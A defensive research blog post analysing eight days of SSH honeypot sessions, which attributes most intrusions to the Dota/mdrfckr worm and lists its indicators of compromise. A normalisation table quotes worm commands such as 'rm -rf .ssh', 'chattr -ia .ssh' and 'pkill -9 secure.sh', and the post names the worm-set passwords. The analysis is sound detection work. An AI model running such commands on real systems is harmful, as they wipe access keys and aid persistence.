98% of SSH Intrusions Come from One Worm
A single honeypot sees around 1.4 million events per day. Most of it is noise. Very little results in actual compromise. We followed every real SSH intrusion over 8 days. Almost all of them led to the same system - or more precisely, the same worm family.
345gs5662d34 credential mechanism. The 98% finding is unaffected.
read →
It looks noisy. In practice, it isn't.
Daily averages from a single honeypot:
| Layer | Volume | Description |
|---|---|---|
| All sensors | ~1.4M | Raw events (passive scans, fingerprinting, background radiation) |
| SSH-related | ~60,000 | Connection attempts, authentication events |
| Successful logins | ~531 | Authenticated SSH sessions |
| Post-login commands | ~4,700 | Actual attacker interaction |
From 1.4 million signals, only a few hundred lead to real access. Everything else is the internet talking to itself.
Events are not attacks. This distinction matters. Most of what security dashboards count as "attacks" is noise: passive scans, failed connections, background internet radiation. Only sessions with successful authentication and post-login commands represent real intrusions.
Two datasets, one story
This analysis combines two views: volumetric baselines (24-hour averages for scale) and a behavioral dataset (8 days of classified sessions for depth).
Methodology
- Sensor: T-Pot honeypot with Cowrie SSH emulation
- All commands are logged with timestamps
- Raw commands are normalized into abstract actions (e.g.
rm -rf→cleanup) - Sessions with sufficient depth are converted into behavioral sequences
- Sequences are clustered into behavioral fingerprints
- A session requires successful login + observable command execution
Sessions with only minimal interaction (1–2 commands) may not contain enough signal for behavioral classification. This matters for the numbers below.
Dataset Construction
- Total successful SSH authentications (8 days): ~4,248
- Sessions with post-login commands: 1,021
- Sessions with sufficient depth for behavioral classification: 1,021
- Sessions attributed to Dota worm family: 1,005 (98%)
Short sessions (login followed by immediate disconnect or 1–2 trivial commands) were excluded from behavioral analysis due to insufficient signal. The 98% figure refers specifically to sessions with enough interaction to construct a behavioral fingerprint.
98% of classified intrusions - one worm
From the 8-day behavioral dataset:
| Metric | Value |
|---|---|
| Total sessions with commands | 1,021 |
| Unique source IPs | 614 |
| Countries | 69 |
| Behavioral fingerprints | 17 |
| Linked to one worm family | 1,005 (98%) |
This isn't similar behavior or loose correlation. It's the same system. A self-propagating SSH worm operating across hundreds of compromised machines.
Meet the worm: Dota
Named after its payload archive: dota3.tar.gz.
Across the dataset, 614 unique source IPs were observed,
of which 605 were linked to the Dota worm family, spanning 69 countries.
These are not independent attackers. They are compromised systems participating in propagation.
Prior research. Variants of the Dota/mdrfckr SSH worm have been documented in previous analyses, including reports by AhnLab and multiple honeypot operators. These studies describe the worm's propagation via SSH key injection and its use of automated deployment scripts.
What is new here: This investigation does not focus on payload analysis or infrastructure tracking. Instead, it introduces behavioral fingerprinting to cluster sessions, identify variant families, and quantify their dominance over a continuous observation window.
Every variant shares one invariant marker:
That SSH key appears across all variants. It acts as the worm's fingerprint.
Payload analysis is outside the scope of this behavioral study. This investigation focuses on observable command sequences and interaction patterns rather than post-deployment functionality.
A deterministic kill chain
Once inside, the worm doesn't improvise. It executes a fixed sequence, consistently observed across hundreds of sessions:
All commands arrive within sub-second intervals. There are no pauses or typing delays. Execution is fully automated.
ATT&CK Mapping
| Stage | Technique | ID |
|---|---|---|
| Initial Access | Remote Services: SSH | T1021.004 |
| Persistence | SSH Authorized Keys | T1098.004 |
| Execution | Unix Shell | T1059.004 |
| Discovery | System Information Discovery | T1082 |
| Propagation | Remote System Discovery | T1018 |
Decisions after the breach
The worm doesn't evaluate targets before compromise. It breaks in first. Then it profiles the system: CPU cores, RAM, disk space, CPU model.
What we observe vs. what we infer. The profiling pattern strongly suggests resource classification, likely distinguishing between mining-capable systems and propagation-only nodes. This is an inference, not a directly observed decision. Due to honeypot constraints, we cannot observe the worm's internal decision logic after profiling.
The most dangerous part: internal propagation
After installation, the worm scans:
This is not internet-wide scanning. This is propagation targeting private address space. One exposed SSH service can become an entry point into an entire internal network.
It knows if you're already infected
Before deploying, the worm checks:
If the file exists, the system is already infected. Deployment is skipped. This is a built-in deduplication mechanism that reduces redundant infections, instability, and noise. This points to controlled propagation, not sloppy malware.
Behavioral DNA: tracking without IOCs
IP tracking fails here. The worm rotates across hundreds of compromised systems. Each infection becomes a new source. Tracking IPs means tracking victims, not the attacker.
Instead, we normalize behavior:
| Command | Normalized Action |
|---|---|
chattr -ia .ssh | persist |
rm -rf .ssh | cleanup |
pkill -9 secure.sh | kill_process |
cat /proc/cpuinfo | recon_system |
echo creds > file | write_file |
Each session becomes a sequence - its Behavioral DNA:
It's not one worm - it's a family
Behavioral analysis revealed 17 fingerprints, 10 linked to the Dota family. Three variants dominate, each with a distinct DNA sequence:
ssh-rsa AAAA...== mdrfckr · 605 IPs · 69 countries
Unlike IOCs, behavioral DNA survives IP rotation, infrastructure changes, and payload variations. Behavioral patterns remain consistent regardless of infrastructure changes.
Infected systems are contested, not owned
The competitor-killer variant changes the picture. Before installing itself, it runs:
It removes competing malware. An infected server is not simply "compromised" but rather contested infrastructure. Multiple malware families compete for persistence, CPU resources, and network position. The Dota worm actively eliminates rivals.
The passwords tell you where it came from
Observed credentials set by the worm:
If these appear in your logs, the source is not a human attacker. It is another infected system. The worm leaves fingerprints across the internet.
Indicators
| Type | Value | Description |
|---|---|---|
| SSH Key | mdrfckr | Injected authorized_keys marker |
| Marker File | /var/tmp/.systemcache436621 | Reinfection check |
| Credentials | 345gs5662d34, 3245gs5662d34 | Worm-set passwords |
| Payload | dota3.tar.gz | Archive name used during deployment |
Sample size and generalization
This dataset comes from one honeypot, 8 days of observation, 1,021 sessions. Does this represent the entire internet? Not necessarily.
However: 69 countries, ~605 source systems, and consistent behavioral patterns across all sessions strongly indicate a globally distributed, coordinated campaign, not isolated activity.
Limitations.
- → Single vantage point (one honeypot, one IP, one country)
- → Cowrie interaction constraints (medium-interaction emulation)
- → Behavior may differ on fully compromised production systems
- → Fingerprint-aware malware may evade behavioral classification
- → 8-day window - longer observation may shift ratios
The real insight: a monoculture
Within sessions that provided enough behavioral signal: ~98% belong to a single worm family.
This is not thousands of independent attackers. It's a monoculture. A self-replicating system moving across hundreds of machines, continuously reinfecting the internet.
If you track IPs, block regions, or count "attacks", you are measuring noise. The signal is in the behavior. The real threat is not individual attackers but autonomous systems that propagate, adapt, compete, and persist.
Defender takeaway. If you operate SSH sensors or review Cowrie logs, look for:
- → SSH key marker:
mdrfckr - → Marker file:
/var/tmp/.systemcache436621 - → Credential patterns:
345gs5662d34 - → Behavioral sequence: persist → cleanup → persist → recon
Fingerprint and subtract this activity. What remains is a much smaller set of sessions that warrant deeper investigation.
This is the first public investigation from NullRoute.
Future publications will cover behavioral clustering, credential reuse campaigns,
and attacker decision patterns observed across multiple sensors.
The 2% that is not Dota is where the interesting threats begin.